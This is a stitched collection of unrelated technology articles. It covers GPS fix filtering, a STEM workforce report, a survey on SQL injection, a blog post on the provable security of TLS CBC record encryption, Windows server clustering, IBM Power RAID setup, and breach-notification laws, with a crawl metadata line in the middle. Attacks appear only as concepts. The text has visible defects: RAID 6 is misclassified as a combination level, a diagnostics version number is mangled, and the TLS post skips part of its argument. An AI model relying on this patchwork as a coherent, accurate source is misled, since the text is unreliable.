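        # else: discard as an outlier (e.g., a multipath reflection)
    return accepted

fixes = [(0, 0.0, 0.0), (1, 1.5, 0.0), (2, 12.0, 0.0), (3, 3.0, 0.0)]
print(filter_fixes(fixes))  # the 12 m jump at t=2 is discarded
```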
Juniper explains all the new modes and algorithms in an extensive paper.
Improving GPS signals is goal of anyone who needs precise location information. That often means following common-sense practices and learning how to properly set up and use a device. Juniper’s app takes refining the process a step further.
John Breeden II is a freelance technology writer for GCN.
Late last month, the National Academy of Engineering and National Research Council released a report that recommended the Defense Department overhaul its recruiting and hiring practices in order to effectively compete for critical workers in the science, technology, engineering and mathematics fields.
While that report put more emphasis on the quality of STEM candidates, a new report released Tuesday by the American Council for Technology and the Industry Advisory Council’s Institute for Innovation focuses on the challenges federal agencies and industry face on the front end -- the quantity of STEM candidates.
While scientific innovation produces roughly half of all U.S. economic growth, the educational pipeline necessary to fill STEM jobs and make that economic growth possible is not up to the task, the report noted. For example, the United States ranked 14th in reading, 17th in science and 25th in mathematics based on an international assessment of 15-year-olds in 70 countries. Inadequate early education is the start of this negative trend, as many students never make it into the STEM pipeline.
In addition, jobs in STEM fields are increasing three times faster than jobs in the rest of the economy, yet American students are not entering these fields in sufficient numbers. That means that by 2018, the nation faces a projected shortfall of 230,000 qualified advanced-degree STEM workers, a problem that is compounded by the large number of Baby Boomer retirements, ACT-IAC found.
Several STEM initiatives, such as the Committee on STEM Education, already exist, but most of the funding for these programs is targeted toward the needs of specific agencies, the report noted. Of the $3.4 billion spent on STEM education, only $312 million is targeted toward improving teacher effectiveness, and only $396 million invests in K-12 education.
The report offers three recommendations for addressing the shortage of STEM candidates:
- Focus federal leadership on STEM education activities by establishing a national challenge for STEM that includes increased public awareness campaigns, improved coordination efforts, innovative grant and tax incentive programs, and calls more urgency to the STEM problem.
- Create a permanent STEM education committee that focuses on coordinating all of the various STEM initiatives and establishing clear methods for measuring the outcomes of federal STEM initiatives.
- Provide universal access to a broadband digital infrastructure and provide the tools, training and devices to improve digital literacy.
“The workforce shortage in the areas of [STEM] is a silent national crisis. ‘Silent’ because it has not received the national focus it deserves,” the report states. “Many -- if not most -- Americans think of the United States as a leader in STEM education and jobs, but this is not true. We are quietly slipping further and further behind because we have not developed a culture that prioritizes STEM.”
On Wednesday, the Ponemon Institute released the results of a new study conducted for DB Networks. In it, 65 percent of the respondents said that they've experienced one or more SQL Injection attacks in the last 12 months. In addition, each incident took an average of 140 days to discover, and 68 days to fix the issue.
"It is commonly accepted that organizations believe they struggle with SQL injection vulnerabilities, and almost half of the respondents said the SQL injection threat facing their organization is very significant, but this study examines much deeper issues," commented Dr. Larry Ponemon.
But there's a problem.
When it comes to preventing SQL Injection, those who took part in the study said that protective measures are lacking, and 52 percent of the respondents said they don't take any precautions, such as code audits and validation checks.
Yet, as mentioned, nearly half of the respondents said that SQL Injection attacks are a significant threat. Moreover, 42 percent said that they believed that SQL Injection is a contributing factor in most breaches.
The lacking prevention can be explained in part because only 31 percent of the respondents say their organization's security / IT teams possess the skills, knowledge, and expertise to detect an SQL Injection attack.
The sample size for this study was small, only 595 respondents across 16 verticals. However, the problem of SQL Injection isn't so small; in fact, this problem has existed since 1998.
Part of the reason SQL Injection persists is that, from the criminal's perspective, it works. Several tools on the web automate SQL Injection, from scanning for vulnerable hosts to harvesting data from the database, and for most criminals that's all they need to compromise data.
For businesses, the issue is a bit more complex. Developers are paid to code, but security still isn't a primary function when a project needs to be delivered on time and under budget.
Code development has come a long way since 1998, but things still slip through the cracks. Those small mistakes that fall between the cracks are the same mistakes that turn into large breaches. This is why code assessments and continual monitoring of applications and data bases is encouraged, or outright mandated.
Still, SQL Injection happens with regularity, and the aftermath of those incidents can be costly and embarrassing (in a PR sense). Obviously, DB Networks has a horse in the race when it comes to preventing SQL Injection, but so do several other vendors. But the basics can often solve the most basic SQL Injection issues, such as those outlined by OWASP.
Still, no matter how your organization deals with SQL Injection, the important part is that it's addressed. It isn't easy, but given the value placed on data, both inside and outside of the company, it's worth the effort.
This story, "Organizations Suffer SQL Injection Attacks, but Do Little to Prevent Them" was originally published by CSO.
The goal of this series is to try to answer an age-old question that is often asked and rarely answered. Namely: is the TLS protocol provably secure?
While I find the question interesting in its own right, I hope to convince you that it’s of more than academic interest. TLS is one of the fundamental security protocols on the Internet, and if it breaks lots of other things will too. Worse, it has broken — repeatedly. Rather than simply patch and hope for the best, it would be fantastic if we could actually prove that the current specification is the right one.
Unfortunately this is easier said than done. In the first part of this series I gave an overview of the issues that crop up when you try to prove TLS secure. They come at you from all different directions, but most stem from TLS’s use of ancient, archaic cryptography; gems like, for example, the ongoing use of RSA-PKCS#1v1.5 encryption fourteen years after it was shown to be insecure.
Despite these challenges, cryptographers have managed to come up with a handful of nice security results on portions of the protocol. In the previous post I discussed Jonnson and Kaliski’s proof of security for the RSA-based TLS handshake. This is an important and confidence-inspiring result, given that the RSA handshake is used in almost all TLS connections.
In this post we’re going to focus on a similarly reassuring finding related to the TLS record encryption protocol — and the ‘mandatory’ ciphersuites used by the record protocol in TLS 1.1 and 1.2 (nb: TLS 1.0 is broken beyond redemption). What this proof tells us is that TLS’s CBC mode ciphersuites are secure, assuming… well, a whole bunch of things, really.
The bad news is that the result is extremely fragile, and owes its existence more to a series of happy accidents than from any careful security design. In other words, it’s just like TLS itself.
Records and handshakes
Let’s warm up with a quick refresher.
TLS is a layered protocol, with different components that each do a different job. In the previous post I mostly focused on the handshake, which is a beefed-up authenticated key agreement protocol. Although the handshake does several things, its main purpose is to negotiate a shared encryption key between a client and a server — parties who up until this point may be complete strangers.
The handshake gets lots of attention from cryptographers because it’s exciting. Public key crypto! Certificates! But really, this portion of the protocol only lasts for a moment. Once it’s done, control heads over to the unglamorous record encryption layer which handles the real business of the protocol: securing application data.
Most kids don’t grow up dreaming about a chance to work on the TLS record encryption layer, and that’s fine — they shouldn’t have to. All the record encryption layer does is, well, encrypt stuff. In 2012 that should be about as exciting as mailing a package.
And yet TLS record encryption still manages to be a source of endless excitement! In the past year alone we’ve seen three critical (and exploitable!) vulnerabilities in this part of TLS. Clearly, before we can even talk about the security of record encryption, we have to figure out what’s wrong with it.
Welcome to 1995
[Image caption: Development of the SSLv1 record encryption layer]
The problem (again) is TLS’s penchant for using prehistoric cryptography, usually justified on some pretty shaky ‘backwards compatibility‘ grounds. This excuse is somewhat bogus, since the designers have actually changed the algorithms in ways that break compatibility with previous versions — and yet retained many of the worst features of the originals.
The most widely-used ciphersuites employ a block cipher configured in CBC mode, along with a MAC to ensure record authenticity. This mode can be used with various ciphers/MAC algorithms, but encryption always involves the following steps:
- If both sides support TLS compression, first compress the plaintext.
- Next compute a MAC over the plaintext, record type, sequence number and record length. Tack the MAC onto the end of the plaintext.
- Pad the result with up to 256 bytes of padding, such that the padded length is a multiple of the cipher’s block size. The last byte of the padding should contain the padding length (excluding this byte), and all padding bytes must also contain the same value. A padded example (with AES) might look like:
0x MM MM MM MM MM MM MM MM MM 06 06 06 06 06 06 06
- Encrypt the padded message using CBC mode. In TLS 1.0 the last block of the previous ciphertext (called the ‘residue’) is used as the Initialization Vector. Both TLS 1.1 and 1.2 generate a fresh random IV for each record.
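The padding scheme in step 3, where every pad byte (including the trailing length byte) carries the same value, is easy to sketch. This is an illustrative Python fragment covering only the pad/check step, not a full record layer, and it applies the minimal pad even though TLS permits up to 255 extra bytes:

```python
BLOCK = 16  # AES block size, matching the padded example above

def tls_pad(data: bytes) -> bytes:
    """Append n pad bytes plus one length byte, all carrying value n."""
    n = BLOCK - (len(data) + 1) % BLOCK
    if n == BLOCK:
        n = 0
    return data + bytes([n]) * (n + 1)

def tls_check_pad(padded: bytes) -> bool:
    """Every pad byte must equal the declared pad length."""
    n = padded[-1]
    if n + 1 > len(padded):
        return False
    return all(b == n for b in padded[-(n + 1):])

msg = b"M" * 9            # nine message bytes, as in the example above
p = tls_pad(msg)
print(p.hex())            # '4d' x9 then '06' x7: one full padded block
```

Note how this reproduces the example above: nine message bytes followed by seven bytes of 0x06.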
To get an idea of what’s wrong with the CBC ciphersuite, you can start by looking at the appropriate section of the TLS 1.2 spec — which reads more like the warning label on a bottle of nitroglycerin than a cryptographic spec. Allow me to sum up the problems.
First, there’s the compression. It’s long been known that compression can leak information about the contents of a plaintext, simply by allowing the adversary to see how well it compresses. The CRIME attack recently showed how nasty this can get, but the problem is not really news. Any analysis of TLS encryption begins with the assumption that compression is turned off.
So ok: no TLS 1.0, no compression. Is that all?
Well, we still haven’t discussed the TLS MAC, which turns out to be in the wrong place — it’s applied before the message is padded and encrypted. This placement can make the protocol vulnerable to padding oracle attacks, which (amazingly) will even work across handshakes. This last fact is significant, since TLS will abort the connection (and initiate a new handshake) whenever a decryption error occurs in the record layer. It turns out that this countermeasure is not sufficient.
To deal with this, recent versions of TLS have added the following patch: they require implementers to hide the cause of each decryption failure — i.e., make MAC errors indistinguishable from padding failures. And this isn’t just a question of changing your error codes, since clever attackers can learn this information by measuring the time it takes to receive an error. From the TLS 1.2 spec:
In general, the best way to do this is to compute the MAC even if the padding is incorrect, and only then reject the packet. For instance, if the pad appears to be incorrect, the implementation might assume a zero-length pad and then compute the MAC. This leaves a small timing channel, since MAC performance depends to some extent on the size of the data fragment, but it is not believed to be large enough to be exploitable.
To sum up: TLS is insecure if your implementation leaks the cause of a decryption error, but careful implementations can avoid leaking much, although admittedly they probably will leak some — but hopefully not enough to be exploited. Gagh!
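The countermeasure from the quoted spec text — compute the MAC even when the padding is bad, and surface only a single generic error — might look like the sketch below. The record layout, HMAC-SHA256 and key sizes are assumptions for illustration; a production implementation needs genuinely constant-time handling, which this toy does not claim to achieve.

```python
import hashlib
import hmac

BLOCK = 16    # cipher block size (assumed)
MAC_LEN = 32  # HMAC-SHA256 output length (assumed)

def check_record(padded: bytes, mac_key: bytes):
    """Return the plaintext, or None on ANY failure.

    The caller sees one generic error: padding failures and MAC failures
    are indistinguishable, and the MAC is computed either way so the two
    paths take similar time (per the TLS 1.2 advice quoted above).
    """
    pad_len = padded[-1]
    pad_ok = (pad_len + 1 <= len(padded) and
              padded[-(pad_len + 1):] == bytes([pad_len]) * (pad_len + 1))
    # On bad padding, assume a zero-length pad and still run the MAC.
    body = padded[:-(pad_len + 1)] if pad_ok else padded[:-1]
    msg, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    expected = hmac.new(mac_key, msg, hashlib.sha256).digest()
    mac_ok = hmac.compare_digest(expected, tag)
    return msg if (pad_ok and mac_ok) else None
```

Even here a timing channel remains — the MAC runs over a different amount of data in the two branches — which is exactly the residual leak the spec admits to.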
At this point, just take a deep breath and say ‘all horses are spherical’ three times fast, cause that’s the only way we’re going to get through this.
Accentuating the positive
Having been through the negatives, we’re almost ready to say nice things about TLS. Before we do, let’s just take a second to catch our breath and restate some of our basic assumptions:
- We’re not using TLS 1.0 because it’s broken.
- We’re not using compression because it’s broken.
- Our TLS implementation is perfect — i.e., doesn’t leak any information about why a decryption failed. This is probably bogus, yet we’ve decided to look the other way.
- Oh yeah: we’re using a secure block cipher and MAC (in the PRP and PRF sense respectively).**
And now we can say nice things. In fact, thanks to a recent paper by Kenny Paterson, Thomas Ristenpart and Thomas Shrimpton, we can say a few surprisingly positive things about TLS record encryption.
What Paterson/Ristenpart/Shrimpton show is that TLS record encryption satisfies a notion they call ‘length-hiding authenticated encryption’, or LHAE. This new (and admittedly made up) notion not only guarantees the confidentiality and authenticity of records, but ensures that the attacker can’t tell how long they are. The last point seems a bit extraneous, but it’s important in the case of certain TLS libraries like GnuTLS, which actually add random amounts of padding to messages in order to disguise their length.
There’s one caveat to this proof: it only works in cases where the MAC has an output size that’s greater than or equal to the cipher’s block size. This is, needless to say, a totally bizarre and fragile condition for the security of a major protocol to hang on. And while the condition does hold for all of the real TLS ciphersuites we use — yay! — this is more a happy accident than the result of careful design on anyone’s part. It could easily have gone the other way.
So how does the proof work?
Good question. Obviously the best way to understand the proof is to read the paper itself. But I’d like to try to give an intuition.
First of all, we can save a lot of time by starting with the fact that CBC-mode encryption is already known to be IND-CPA secure if implemented with a secure block cipher (PRP). This result tells us only that CBC is secure against passive attackers who can request the encryption of chosen messages. (In fact, a properly-formed CBC mode ciphertext should be indistinguishable from a string of random bits.)
The problem with plain CBC-mode is that these security results don’t hold in cases where the attacker can ask for the decryption of chosen ciphertexts.
This limitation is due to CBC’s malleability — specifically, the fact that an attacker can tamper with a ciphertext, then gain useful information by sending the result to be decrypted. To show that TLS record encryption is secure, what we really want to prove is that tampering gives no useful results. More concretely, we want to show that asking for the decryption of a tampered ciphertext will always produce an error.
We have a few things working in our favor. First, remember that the underlying TLS record has a MAC on it. If the MAC is (PRF) secure, then any ciphertext tampering that results in a change to this record data or its MAC will be immediately detected (and rejected) by the decryptor. This is good.
Unfortunately the TLS MAC doesn’t cover the padding. To continue our argument, we need to show that no attacker can produce a legitimate ciphertext, and that includes tampering that messes with the padding section of the message. Here again things look intuitively good for TLS. During decryption, the decryptor checks the last byte of the padded message to see how much padding there is, then verifies that all padding bytes contain the same numeric value. Any tampering that affects this section of the plaintext should either:
- Produce inconsistencies in some padding bytes, resulting in a padding error, or
- Cause the wrong amount of padding to be stripped off, resulting in a MAC error.
This all seems perfectly intuitive, and you can imagine the TLS developers making exactly this argument as they wrote up the spec. However there’s one small exception to the rule above, which can turn up in TLS implementations that add an unnecessarily large amount of padding to the plaintext (for example, GnuTLS).
To give an example, let’s say the unpadded record + MAC is 15 bytes. If we’re using AES, then this plaintext can be padded with a single byte. Of course, if we’re inclined to add extra padding, it could also be padded with seventeen bytes — both are valid padding strings. In the first case the lone padding byte contains 0x00; in the second, all seventeen padding bytes contain 0x10.
You see, if TLS MACs are always bigger than a ciphertext block, then all messages will obey a strict rule: no padding will ever appear in the first block of the CBC ciphertext.
Since the padding is now guaranteed to start in the second (or later) block of the CBC ciphertext, the attacker cannot ‘tweak’ it by modifying the IV (this attack only works against the first block of the plaintext). Instead, they would have to tamper with a ciphertext block. And in CBC mode, tampering with ciphertext blocks has consequences! Such a tweak will allow the attacker to change padding bytes, but as a side effect it will cause one entire block of the record or MAC to be randomized when decrypted. And what Paterson/Ristenpart/Shrimpton prove is that this ‘damage’ will inevitably lead to a MAC error.
This ‘lucky break’ means that an attacker can’t successfully tamper with a CBC-mode TLS ciphertext. And that allows us to push our way to a true proof of the CBC-mode TLS ciphersuites. By contrast, if the MAC was only 80 bits (as it is in some IPSEC configurations), the proof would not be possible. So it goes.
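The arithmetic behind this condition is simple enough to check directly: in a record laid out as data || MAC || padding, the padding begins at byte offset data_len + mac_len, so a MAC at least one block long pushes it out of block zero. A small illustrative sketch:

```python
def padding_start_block(data_len: int, mac_len: int, block: int = 16) -> int:
    # For a record laid out as data || MAC || padding, padding begins at
    # byte offset data_len + mac_len; return the CBC block index that
    # offset falls in (block 0 is the one XORed against the IV).
    return (data_len + mac_len) // block
```

With a SHA-1-size (20-byte) or larger MAC the padding can never begin in block 0, even for an empty record; with an 80-bit (10-byte) MAC — as in some IPSEC configurations — a short record puts padding in block 0, and the proof falls apart.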
Now I realize this has all been pretty wonky, and that’s kind of the point! The moral to the story is that we shouldn’t need this proof in the first place! What it illustrates is how fragile and messy the TLS design really is, and how (once again) it achieves security by luck and the skin of its teeth, rather than secure design.
What about stream ciphers?
The good news — to some extent — is that none of the above problems apply to stream ciphers, which don’t attempt to hide the record length, and don’t use padding in the first place. So the security of these modes is much ‘easier’ to argue.
There’s probably a lot more that can be said about TLS record encryption, but really… I think this post is probably more than anyone (outside of the academic community and a few TLS obsessives) has ever wanted to read on the subject.
* One thing I don’t mention in this post is the TLS 1.0 ’empty fragment’ defense, which actually works against BEAST and has been deployed in OpenSSL for several years. The basic idea is to encrypt an empty record of length 0 before each record goes over the wire. In practice, this results in a full record structure with a MAC, and prevents attackers from exploiting the residue bug. Although nobody I know of has ever proven it secure, the proof is relatively simple and can be arrived at using standard techniques.
** The typical security definition for a MAC is SUF-CMA (strongly unforgeable under chosen message attack). This result uses the stronger — but also reasonable — assumption that the MAC is actually a PRF.
Configuring and Planning a Windows Server Cluster
In the first three installments of this series ( Is a Server Cluster Right for Your Organization? , Choosing the Cluster Type that's Right For You , and Network Load Balancing Clusters ), I discuss the concepts involved in setting up a server cluster. As I do, I discuss some of the differences between the Network Load Balancing (NLB) model and the server cluster model. In this final article in the series, I'll discuss the server cluster model in greater detail.
A Quick Cluster Refresher
Just as a reminder, I'll take just a moment to describe what constitutes a server cluster. On a Windows network, a server cluster is a cluster of two or more machines running Windows 2000 Advanced Server that function as a single machine. Although the machines have separate CPUs and network cards, they are linked to a common storage unit--usually through a fiber channel or SCSI bus. If either unit were to fail, the other unit would keep running, thus providing continuous availability of the application the cluster is hosting.
Keep in mind that not all configurations keep the servers mirrored. Instead, the server cluster model relies on something called a fail-over policy. The fail-over policy dictates the behavior of the cluster during a failure situation. For example, suppose that the first CPU in a cluster were to fail. The fail-over policy on the second CPU would dictate which applications from the failed first CPU would temporarily run on the second CPU. The fail-over policy can also shut down non-critical services and applications on the functional CPU to make way for the extra load it must endure during a failure situation.
Configuring a Server Cluster
There are several different ways to configure a server cluster. Which method is right for you depends largely on what you're trying to accomplish. For example, are you more worried about high availability, load balancing, or both?
If you're the type who wants it all, you'll be happy to know that you can have high availability with load balancing. To do this, you'll have to set the cluster's policies to run some applications or services on one CPU and the remaining applications and services on the other CPU. You must then set the cluster's fail-over policy in such a way that if any of the applications or services fail, they will be run on the other CPU. Obviously, during a failure situation, the functional CPU may become bogged down, because it's performing twice the usual workload. Therefore, you might set the fail-over policy so that if either machine has to take over for a failed CPU, the unnecessary services or applications will be temporarily suspended until the failed unit comes back online. Although this method is tedious to configure, it provides a great mix of performance and availability.
If the idea of having a server bog down during a failure or the thought of shutting down unnecessary services bothers you, there are alternatives. One such alternative is to implement high availability without load balancing. In this implementation, one server basically runs everything. The other server in the cluster is on constant standby as a hot spare. If the first CPU fails, the fail-over policy shifts control of all applications and services to the second CPU. By using this method, your end users will probably never even notice when a problem occurs. When the failed CPU is brought back online, it takes over control of all of the services and applications, and the second CPU goes back into standby mode.
In the past, I've worked for several organizations in which management deemed one or two applications to be mission critical. In these environments, management never wanted to see a network failure of any kind; but if the network did fail, they really didn't care what failed, as long as those essential applications were still running.
In such environments, load shedding is a great configuration. This configuration is especially effective because it not only guarantees that the application will be available under any circumstances, it also ensures that the application's performance won't suffer because of a bogged-down server.
In the load-shedding model, the clustered servers each run their own set of applications, just as you normally would on two separate servers (remember that the cluster is still seen as a single server by the rest of the network). The only difference is that the fail-over policy defines the critical applications. Now, suppose that one of the CPUs fails. During this failure, the second CPU would detect the failure and look at the fail-over policy. The fail-over policy would then tell the CPU to shut down all non-essential applications and to begin servicing any essential applications that were previously running on the failed CPU.
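As a rough sketch of how such a load-shedding fail-over policy might be expressed (the node names and application inventory here are entirely hypothetical — this is not any real cluster product's configuration format):

```python
# Hypothetical inventory: node -> {application: is it flagged critical?}
POLICY = {
    "node1": {"customer_mgmt": True, "sales_db": True, "reporting": False},
    "node2": {"intranet": False, "mail": True},
}

def surviving_workload(failed_node: str, policy=POLICY) -> set:
    """Apps the surviving node runs after `failed_node` goes down.

    Load-shedding rule: the survivor sheds its own non-critical apps
    and adopts the failed node's critical ones.
    """
    survivor = next(n for n in policy if n != failed_node)
    keep = {app for app, critical in policy[survivor].items() if critical}
    adopt = {app for app, critical in policy[failed_node].items() if critical}
    return keep | adopt
```

For example, if node1 fails, node2 drops its non-critical intranet service and picks up the critical customer-management application and its database.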
Once you have an idea of which cluster model is right for your environment, you have a lot more planning to do. The first part of this process is to create an exhaustive list of your applications. This list should include things like the current location of each application, any dependencies related to the application, and just how critical the application is. For example, if you have a critical customer management program, you might list the place that the program currently resides and indicate that the program is dependent on the sales database running in the background. Therefore, you'd also want to document the location of the sales database and flag both the program and the underlying database as critical applications. If you're questioning the critical status of the database, consider that the customer management program is critical and can't run without the database; therefore, the database is also critical.
While determining dependencies, you must also look for applications that have common dependencies. For example, suppose that you have two applications that both depend on the same underlying database. Because of the dependency structure, these applications and their dependencies must always be grouped together.
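Grouping applications that share dependencies is a small graph problem. A hedged sketch using union-find (the application and resource names are hypothetical):

```python
def failover_groups(deps):
    """Group applications that share any dependency, directly or
    transitively, so each group can fail over as a unit.

    `deps` maps an application name to the set of resources it needs.
    Union-find merges every application with its dependencies.
    """
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    for app, resources in deps.items():
        for r in resources:
            parent[find(app)] = find(r)

    groups = {}
    for app in deps:
        groups.setdefault(find(app), set()).add(app)
    return sorted(groups.values(), key=sorted)
```

Two front-end programs that both depend on the same sales database land in one group and must always move between nodes together.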
Finally, when designing your fail-over policy, you must consider the impact of that policy. For starters, if you make the second server take over running a critical application, will all the dependencies be in place for the application to run? You must also consider hardware-related issues, such as whether the servers have fast enough processors and enough memory to handle the fail-over policy that you've designed without crashing or bogging down. As you can see, setting up a cluster can be a great way to protect your data or to increase the speed of a Web site. In this article, I've explained the type of clustering environment that's suitable for both situations.
Brien M. Posey is an MCSE who works as a freelance writer. His past experience includes working as the director of information systems for a national chain of health care facilities and as a network engineer for the Department of Defense. Because of the extremely high volume of e-mail that Brien receives, it's impossible for him to respond to every message, although he does read them all. | <urn:uuid:1c5c6baf-0f39-4239-ac83-34885929474b> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/netsysm/article.php/624431/Configuring-and-Planning-a-Windows-Server-Cluster.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170700.71/warc/CC-MAIN-20170219104610-00006-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949499 | 1,415 | 2.5625 | 3 |
Hardware RAID configuration on the IBM Power platform
RAID stands for Redundant Array of Independent Disks and it involves two key design goals: Increased data reliability and increased input/output (I/O) performance. When multiple physical disks are set up to use the RAID technology, they are said to be in a RAID array. This array distributes data across multiple disks, but the array is seen by the computer user and operating system as one single disk. RAID can be set up to serve several different purposes.
Different types of RAID levels
Different types of RAID levels are available. Some are basic RAID levels and some are a combination of basic levels.
- RAID 0
- RAID 1
- RAID 5
- RAID 6
- RAID 10
- RAID 50
- RAID 60
Here, RAID 0, RAID 1, and RAID 5 are the basic RAID levels and the remaining RAID 6, RAID 10, RAID 50, and RAID 60 are the combination of the basic RAID levels.
Each RAID level is defined for a specific purpose. Read through the following table to get a better understanding of the various RAID levels.
| RAID level | Minimum drives | Protection | Description | Strengths | Weaknesses |
| --- | --- | --- | --- | --- | --- |
| RAID 0 | 2 | None | Data striping without redundancy | Highest performance | No data protection; if one drive fails, all data is lost |
| RAID 1 | 2 | Single-drive failure | Disk mirroring | Very high performance and data protection; very good write performance | High redundancy cost; because all data is duplicated, twice the storage capacity is required |
| RAID 5 | 3 | Single-drive failure | Block-level data striping with distributed parity | Best cost/performance for transaction-oriented networks; very high performance and data protection; supports multiple simultaneous reads and writes; can also be optimized for large, sequential requests | Write performance is slower than RAID 0 or RAID 1 |
| RAID 6 | 4 | Two-drive failure | Same as RAID 5, with parity distributed across a second drive | Solid performance with the added fault tolerance of keeping data available if two disks in a RAID group fail; using more drives per group offsets the performance and disk-utilization penalty relative to RAID 5 | Two drives' worth of capacity is used for parity, so disk utilization is lower than RAID 5; performance is slightly lower than RAID 5 |
| RAID 10 | 4 | One drive per mirrored stripe (not the same mirror) | Combination of RAID 0 (data striping) and RAID 1 (mirroring) | Very high performance and data protection (can tolerate multiple drive failures) | High redundancy cost; because all data is duplicated, twice the storage capacity is required; requires a minimum of four drives |
| RAID 50 | 6 | One drive per RAID 5 set | Combination of RAID 0 (data striping) and RAID 5 (distributed parity) | High performance and data protection (can tolerate one drive failure per RAID 5 set) | One drive's worth of capacity per RAID 5 set goes to parity; requires a minimum of six drives |
| RAID 60 | 8 | Two drives per RAID 6 set | Combination of RAID 0 (data striping) and RAID 6 (dual distributed parity) | High performance and data protection (can tolerate two drive failures per RAID 6 set) | Two drives' worth of capacity per RAID 6 set goes to parity; requires a minimum of eight drives |
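As a quick companion to the table, here is a sketch of the approximate usable capacity per level. It assumes equal-size drives and, for RAID 50/60, exactly two striped sub-arrays; real controllers allow other layouts, so treat the numbers as illustrative.

```python
def usable_capacity(level: int, n_drives: int, drive_size: float) -> float:
    """Approximate usable capacity for the RAID levels in the table.

    Assumes equal-size drives; for RAID 50/60, assumes exactly two
    striped sub-arrays (real controllers may use more).
    """
    if level == 0:
        return n_drives * drive_size          # striping, no redundancy
    if level == 1:
        return drive_size                     # full mirror of one drive
    if level == 5:
        return (n_drives - 1) * drive_size    # one drive's worth of parity
    if level == 6:
        return (n_drives - 2) * drive_size    # two drives' worth of parity
    if level == 10:
        return (n_drives // 2) * drive_size   # striped mirrors
    if level == 50:
        return (n_drives - 2) * drive_size    # one parity drive per RAID 5 set
    if level == 60:
        return (n_drives - 4) * drive_size    # two parity drives per RAID 6 set
    raise ValueError(f"unsupported RAID level: {level}")
```

For example, four 300 GB drives yield 900 GB usable in RAID 5 but only 600 GB in RAID 6 or RAID 10.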
Supported RAID levels in IBM Power platforms
The following RAID levels are supported by IBM Power hardware.
- RAID 0
- RAID 5
- RAID 6
- RAID 10
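The single-drive fault tolerance of the parity-based levels (RAID 5 in particular) rests on byte-wise XOR: the parity block is the XOR of the data blocks in a stripe, and the very same operation rebuilds a lost block. A minimal sketch:

```python
def parity(blocks):
    # The parity block is the byte-wise XOR of the stripe's data blocks.
    out = bytearray(len(blocks[0]))
    for block in blocks:
        for i, byte in enumerate(block):
            out[i] ^= byte
    return bytes(out)

def rebuild(surviving_blocks, parity_block):
    # XOR-ing the parity with the surviving blocks recovers the lost
    # block -- reconstruction is the same operation as parity generation.
    return parity(surviving_blocks + [parity_block])
```

This is why RAID 5 survives exactly one failed drive per group: one unknown can be solved from the XOR equation, but a second failure leaves two unknowns (hence RAID 6's second parity).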
Configuring RAID on the Power platform
Perform the following steps to configure RAID 5 on the Power platform.
- Get the supported diagnostics CD for the specific hardware. Here, I'm going to configure RAID on the Power platform; hence, I used the following media: Version 22.214.171.124 (for selected Power/PowerPC-based systems)
- Create the logical partition (LPAR) by assigning the RAID controller to it. Note that we cannot combine two or more disk controllers in a single RAID array configuration.
- Start the LPAR with the diagnostics CD.
- Type 2 and then press Enter, as mentioned in the console screen.
- Press Enter to continue.
- On the FUNCTION SELECTION page, select the third option.
- Enter the terminal type, preferably vt100 and press Enter.
- From the tasks selection list, select RAID Array Manager and press Enter.
- From the list of available disk controllers, select an appropriate disk array manager and press Enter.
- In the disk array manager, we can get different options for different operations, such as listing, creating, deleting and so on. Select List SAS Disk Array Configuration.
- Then, select the appropriate RAID adapter. To do so, move the cursor to the required option and press Esc+7. A list of the disks available in the selected controller is displayed.
- Now, press F3 to move back to the main screen. Then, select the Create an Array Candidate pdisk and Format to 528 Byte Sectors option and press Enter. It is mandatory to create an array candidate.
- Select the Small Computer System Interface (SCSI) controller whose disks will be used to create array candidates.
- Press F7 or Esc+7 to mark the disks as an array candidate.
- After selecting the disk, press Enter to begin formatting.
- Press Enter to continue.
- Now, create the array using the array candidates.
- Select the required RAID level. In this example, I've selected RAID 5.
- Select the stripe size (256 KB is the default and recommended value) and press Enter.
- Select the array candidates on which to create RAID and press Enter.
- After your configuration is complete, press Enter. The following screen is displayed.
- Now we are ready with the RAID configuration. Press F3 to go to the main screen.
- To check the array configuration status, select List SAS Disk Array Configuration.
After the hdisk is available, it is ready for use by assigning it to any LPAR.
General usage of this setup
This kind of setup is mainly for hardware redundancy with respect to disks.
- Hardware data redundancy with RAID 5 is more stable than OS-level mirroring.
- This setup is best suited when we assign a disk from Virtual I/O Server (VIOS) to many LPARs.
- There is no need to configure an OS-level mirror in every LPAR.
Over the past five years, 43 U.S. states have adopted data breach notification laws, but has all of this legislation actually cut down on identity theft? Not according to researchers at Carnegie Mellon University who have published a state-by-state analysis of data supplied by the U.S. Federal Trade Commission (FTC).
"There doesn't seem to be any evidence that the laws actually reduce identity theft," said Sasha Romanosky, a Ph.D student at Carnegie Mellon who is one of the paper's authors.
Romanosky's team took a state-by-state look at FTC identity theft complaints filed between 2002 and 2006 to see whether there was a noticeable impact on complaints in states that had adopted data breach notification laws such as California's SB 1386, which compels companies and institutions to notify state residents when their personal information has been lost or stolen. Their paper is set to be presented at a conference on Information Security Economics held at Dartmouth College later this month.
Since 1999 the FTC has invited identity theft victims to log information about their cases on its Web site. The data are then made accessible to law enforcement, which uses the information to help analyze crime trends. Many people file complaints, but they represent only a fraction of all identity theft cases. In 2006, for example, the FTC logged 246,035 identity theft complaints, while a Javelin Strategy survey estimated that there were 8.9 million ID theft victims that year.
The FTC doesn't break down identity theft complaints on a state-by-state basis. However, the Carnegie Mellon researchers were able to access this information using a Freedom of Information Act request. This allowed them to see whether there was a change in the rate of reported identity thefts before and after data breach laws went on the books. Looking at the complaints on a month-by-month basis, they didn't find any statistically significant effect, Romanosky said.
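The core of such a before-and-after comparison can be sketched in a few lines. This uses toy data and a simple difference of means; the actual study uses regression analysis with many controls (population, GDP, fraud rate), so this is only an illustration of the idea.

```python
from statistics import mean

def before_after_rates(monthly_complaints, law_month):
    """Mean monthly identity-theft complaints before and after a state's
    breach-notification law takes effect.

    `monthly_complaints` is a list of (month_index, complaint_count)
    pairs; `law_month` is the month the law went on the books.
    """
    before = [c for m, c in monthly_complaints if m < law_month]
    after = [c for m, c in monthly_complaints if m >= law_month]
    return mean(before), mean(after)
```

A statistically careful version would also test whether any observed difference could be explained by chance or by the other state-level factors the researchers found significant.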
However, they found that other factors, such as the state's population, gross domestic product and fraud rate did have a significant effect on identity theft rates.
